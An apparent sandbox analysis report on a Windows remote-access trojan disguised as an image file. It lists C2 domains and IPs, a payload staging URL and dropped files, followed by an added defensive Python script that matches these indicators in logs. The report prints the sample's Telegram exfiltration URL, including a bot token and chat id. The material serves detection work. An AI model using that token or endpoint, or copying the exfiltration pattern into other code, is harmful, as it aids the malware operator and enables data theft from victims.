Engine | Download Report | Detection | Info |
---|---|---|---|
 | | malicious | |
 | | malicious, Score: 100 | System: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
IP | Country | Detection |
---|---|---|
79.134.225.75 | Switzerland | |
149.154.167.220 | United Kingdom | |
144.76.120.25 | Germany | |
178.237.33.50 | Netherlands | |
Name | IP | Detection |
---|---|---|
remcapi.duckdns.org | 79.134.225.75 | |
geoplugin.net | 178.237.33.50 | |
www.uplooder.net | 144.76.120.25 | |
api.telegram.org | 149.154.167.220 | |
Name | Detection |
---|---|
remcapi.duckdns.org | |
http://james.newtonking.com/projects/json | |
http://geoplugin.net/json.gp | |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | |
http://api.telegram.org | |
https://www.nuget.org/packages/Newtonsoft.Json.Bson | |
https://www.newtonsoft.com/json | |
https://www.uplooder.net/img/image/57/b15c1f2fa18efb7b0a2e9e577171ed5d/IMG-ZIRAATI03102022-Wqnntgku. | |
https://www.uplooder.net | |
https://api.telegram | |
https://api.telegram.org45k$1 | |
https://www.uplooder.net/img/image/57/b15c1f2fa18efb7b0a2e9e577171ed5d/IMG-ZIRAATI03102022-Wqnntgku.jpg | |
https://www.newtonsoft.com/jsonschema | |
https://api.telegram.org/bot5700424484:AAHP7I1VQ--kj9KZNXGLeSEyqUKvt4ILTyk/sendMessage?chat_id=1391434830&text=%0D%0A%F0%9F%94%8A%20*NEW%20EXECUTION*%0D%0A1%EF%B8%8F%E2%83%A3%20User%20=%20user%0D%0A2%EF%B8%8F%E2%83%A3%20Date%20UTC%20=%2010/3/2022%2011:03:09%20PM%0D%0A3%EF%B8%8F%E2%83%A3%20File%20=%20IMG-ZIRAATI03102022.exe | |
https://api.telegram.org/bot5700424484:AAHP7I1VQ--kj9KZNXGLeSEyqUKvt4ILTyk/sendMessage?chat_id=13914 | |
http://geoplugin.net/json.gp/C | |
https://api.telegram.org/bot | |
https://api.telegram.org | |
Name | File Type | Hashes | Detection |
---|---|---|---|
C:\ProgramData\work\FILE.EXE | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | | |
C:\ProgramData\work\FILE.EXE:Zone.Identifier | ASCII text, with CRLF line terminators | | |
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\IMG-ZIRAATI03102022.exe.log | ASCII text, with CRLF line terminators | | |
C:\Users\user\AppData\Local\Temp\install.vbs | data | | |
C:\Users\user\AppData\Roaming\FILE.exe | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | | |
C:\Users\user\AppData\Roaming\FILE.exe:Zone.Identifier | ASCII text, with CRLF line terminators | | |
C:\ProgramData\remcos\logs.dat | data | | |
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FILE.exe.log | ASCII text, with CRLF line terminators | | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\json[1].json | JSON data | | |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | data | | |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | data | | |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eijp20js.dii.psm1 | very short file (no magic) | | |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrha0431.05b.ps1 | very short file (no magic) | | |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nrxaxftx.vxf.ps1 | very short file (no magic) | | |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rvimo0ac.yrw.psm1 | very short file (no magic) | | |
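The tables above list the indicators the sandbox extracted but say nothing about how to use them. The following is an added example, not part of the sandbox report, that turns the report's network and file IOCs into a small log matcher and decodes the Telegram Bot API `sendMessage` URL the sample used to announce a new execution. The IOC values are copied from the tables; the log line layout, the sample lines and the assumed token shape (`<numeric bot id>:<35-character secret>`) are assumptions made for this example. Two caveats a practitioner should apply when lifting indicators from this page: the newtonsoft.com, nuget.org, newtonking.com and schemas.xmlsoap.org URLs are strings embedded by the Newtonsoft.Json library and are not attacker infrastructure, and geoplugin.net is a public geolocation API that many unrelated programs query, so it is too noisy to alert on by itself.

```python
"""Added example, not part of the sandbox report: match the report's IOCs
against log lines and decode the Telegram Bot API exfiltration URL.

IOC values are copied from the report tables. The log line format, the
sample lines and the bot-token regex are assumptions made for this example.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Network and file IOCs from the report. Newtonsoft/NuGet/xmlsoap URLs in the
# strings table are library metadata and are deliberately left out.
C2_DOMAINS = {"remcapi.duckdns.org"}
C2_IPS = {"79.134.225.75"}
STAGING_HOSTS = {"www.uplooder.net"}
FILE_ARTIFACTS = {
    r"c:\programdata\work\file.exe",
    r"c:\users\user\appdata\roaming\file.exe",
    r"c:\programdata\remcos\logs.dat",
    r"c:\users\user\appdata\local\temp\install.vbs",
}

# Assumed Telegram token shape: "<numeric bot id>:<35-char secret>". Matching the
# shape rather than the literal token keeps the rule alive after a token rotation.
TELEGRAM_BOT_URL = re.compile(
    r"https?://api\.telegram\.org/bot(?P<token>\d+:[A-Za-z0-9_-]{35})/(?P<method>\w+)"
)
URL_RE = re.compile(r"""https?://[^\s"']+""")
# Do not match 79.134.225.75 inside e.g. 179.134.225.75 or 79.134.225.75.1
IP_RES = [re.compile(rf"(?<![\d.]){re.escape(ip)}(?![\d.])") for ip in C2_IPS]


def decode_telegram_exfil(url: str) -> Optional[Dict[str, object]]:
    """Pull bot id, chat_id and the message fields out of a sendMessage URL.

    Returns None when the URL is not a Bot API call with a well-formed token.
    """
    m = TELEGRAM_BOT_URL.match(url)
    if not m:
        return None
    query = parse_qs(urlsplit(url).query)          # percent-decodes the values
    text = query.get("text", [""])[0]
    fields: Dict[str, str] = {}
    for line in text.splitlines():                  # message uses CRLF (%0D%0A)
        if "=" in line:
            key, value = line.split("=", 1)
            # Drop the "1️⃣ " style bullet (digit + U+FE0F + U+20E3) from the key.
            fields[key.strip(" 0123456789\ufe0f\u20e3")] = value.strip()
    return {
        "bot_id": m["token"].split(":")[0],         # the secret half is not echoed
        "method": m["method"],
        "chat_id": query.get("chat_id", [""])[0],
        "fields": fields,
    }


def classify_log_line(line: str) -> List[str]:
    """Tag one log line with the IOC categories it hits (empty list = clean)."""
    tags: List[str] = []
    low = line.lower()
    if any(d in low for d in C2_DOMAINS) or any(r.search(line) for r in IP_RES):
        tags.append("remcos-c2")
    if any(h in low for h in STAGING_HOSTS):
        tags.append("payload-staging")
    if any(p in low for p in FILE_ARTIFACTS):
        tags.append("remcos-file-artifact")
    if any(decode_telegram_exfil(u) for u in URL_RE.findall(line)):
        tags.append("telegram-bot-exfil")
    return tags


# The sendMessage URL as listed in the report's URL table.
EXFIL_URL = (
    "https://api.telegram.org/bot5700424484:AAHP7I1VQ--kj9KZNXGLeSEyqUKvt4ILTyk/"
    "sendMessage?chat_id=1391434830&text=%0D%0A%F0%9F%94%8A%20*NEW%20EXECUTION*"
    "%0D%0A1%EF%B8%8F%E2%83%A3%20User%20=%20user%0D%0A2%EF%B8%8F%E2%83%A3%20Date"
    "%20UTC%20=%2010/3/2022%2011:03:09%20PM%0D%0A3%EF%B8%8F%E2%83%A3%20File%20="
    "%20IMG-ZIRAATI03102022.exe"
)
# Constructed sample lines in an assumed "timestamp source key=value" layout.
SAMPLE_LOGS = [
    f'2022-10-03T23:03:09Z proxy user=user method=GET url="{EXFIL_URL}"',
    "2022-10-03T23:02:55Z dns client=10.0.0.5 query=remcapi.duckdns.org answer=79.134.225.75",
    r"2022-10-03T23:03:01Z sysmon eid=11 image=C:\Users\user\AppData\Roaming\FILE.exe "
    r"target=C:\ProgramData\remcos\logs.dat",
    '2022-10-03T23:03:04Z proxy user=user method=GET url="https://www.uplooder.net/img/'
    'image/57/b15c1f2fa18efb7b0a2e9e577171ed5d/IMG-ZIRAATI03102022-Wqnntgku.jpg"',
    '2022-10-03T23:03:05Z proxy user=user method=GET url="https://www.newtonsoft.com/json"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        print(classify_log_line(line) or ["clean"], line[:70])
    print(decode_telegram_exfil(EXFIL_URL))
```

Running the block prints one tag list per sample line and the decoded exfil message, whose `fields` give the victim username, execution time and launched file name that the sample reported to its operator. The bot id and chat id are kept because they identify the operator's channel; the secret half of the token is not echoed into the output so that alert text does not itself become a credential leak.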